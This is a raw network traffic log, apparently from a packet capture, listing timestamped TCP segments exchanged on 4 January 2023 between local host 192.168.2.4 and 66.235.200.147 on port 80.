Jan 4, 2023 16:47:38.771925926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771941900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771954060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771979094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771985054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772013903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772043943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772288084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772329092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772367001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772387981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772407055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772418022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772445917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772454977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772485018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772494078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772526026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772528887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772564888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772572994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772603989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772610903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772644043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772648096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772685051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772689104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772723913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772730112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772763968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772783995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772795916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772816896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772821903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772849083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772852898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772876024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772878885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772891045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772902012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772927999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772929907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772955894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.772958040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772981882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.772984028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773011923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773087978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773088932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773088932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773268938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773313046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773353100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773353100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773366928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773392916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773406029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773430109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773438931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773468971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773477077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773505926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773515940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773541927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773560047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773567915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773592949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773596048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773618937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773619890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773633957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773646116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773669958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773670912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773694992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773695946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.773710012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.773740053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.870654106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.870748997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.870791912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.870832920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.870872974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.870913029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.870943069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.870951891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.870944023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.870944023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.870992899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871035099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871054888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871054888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871056080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871074915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871097088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871119976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871145010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871162891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871206999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871208906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871241093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871252060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871296883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871303082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871331930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871337891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871373892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871378899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871402979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871423006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871454954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871463060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871490955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871504068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871525049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871543884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871577024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871583939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871603012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871627092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871668100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871678114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871678114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871709108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871743917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871743917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871777058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871783972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871807098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871824980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871864080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871862888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871891975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871906042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871934891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871948004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.871985912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.871988058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872011900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872030020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872057915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872071028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872108936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872112036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872132063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872152090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872183084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872190952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872234106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872236013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872263908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872276068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872311115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872318029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872359037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872360945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872392893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872399092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872425079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872441053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872469902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872481108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872503996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872523069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872550011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872564077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872595072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872603893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872627020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872646093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872705936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872724056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872756004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872765064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872782946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872806072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872837067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872848034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872879028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872890949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872910023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872931957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872967005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.872972012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.872993946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873013973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873039961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873056889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873087883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873099089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873121023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873140097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873169899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873181105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873203039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873222113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873253107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873265982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873286009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873307943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873332024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873348951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873378038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873389959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873409986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873447895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873464108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873490095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873524904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873528957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873549938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873569965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873598099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873610973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873631001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873651981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873687983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873692036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873713970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873733997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873756886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873774052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873802900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873816013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873833895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873856068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873883009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873898029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873933077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873939037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.873965025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.873980045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874012947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874022007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874041080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874063015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874097109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874102116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874121904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874144077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874176979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874183893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874228001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874241114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874241114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874269962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874284983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874309063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874347925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874377966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874377966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874387980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874413967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874429941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874458075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874499083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874515057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874542952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874546051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874584913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874591112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874614000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874655008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874671936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874716043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874737024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874737024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874761105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874797106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874804020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874830008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874846935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874881029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874888897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874932051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.874932051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874958992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.874974012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875015974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875017881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875045061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875056982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875093937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875098944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875123024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875140905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875184059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875184059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875211954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875226021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875267029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875271082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875293970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875313044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875344038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875354052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875377893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875396013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875438929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875437975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875468969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875480890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875519991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875523090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875546932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875565052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875595093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875607014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875628948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875648975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875680923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875690937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875715017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875732899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875766039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875775099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875802994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875817060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875857115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875864029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875891924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875900984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875924110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.875941992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875982046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.875983953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876010895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876024961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876051903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876068115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876101017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876111031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876133919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876156092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876183987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876276970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876315117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.876317024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876317024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.876355886 CET	80	49696	66.235.200.147	192.168.2.4
